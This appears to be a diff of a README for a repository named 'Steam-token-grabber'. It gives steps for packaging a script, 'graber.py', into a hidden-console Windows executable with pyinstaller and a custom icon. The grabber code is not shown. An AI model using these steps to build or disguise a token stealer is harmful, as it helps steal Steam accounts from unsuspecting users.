Tilto66/Steam-token-grabber/README.md

 ### How do I put it in .exe format
 Install python [here](https://www.python.org/downloads/)
- You have 2 options: either you:
+ You have 2 options.
+Either you:
 1. You run in a cmd <code>pip install pyinstaller</code>
 2. <code>cd C:/your/path/where/is/your/folder </code>
 3. <code>pyinstaller --onefile --noconsole --icon=icone.ico graber.py</code>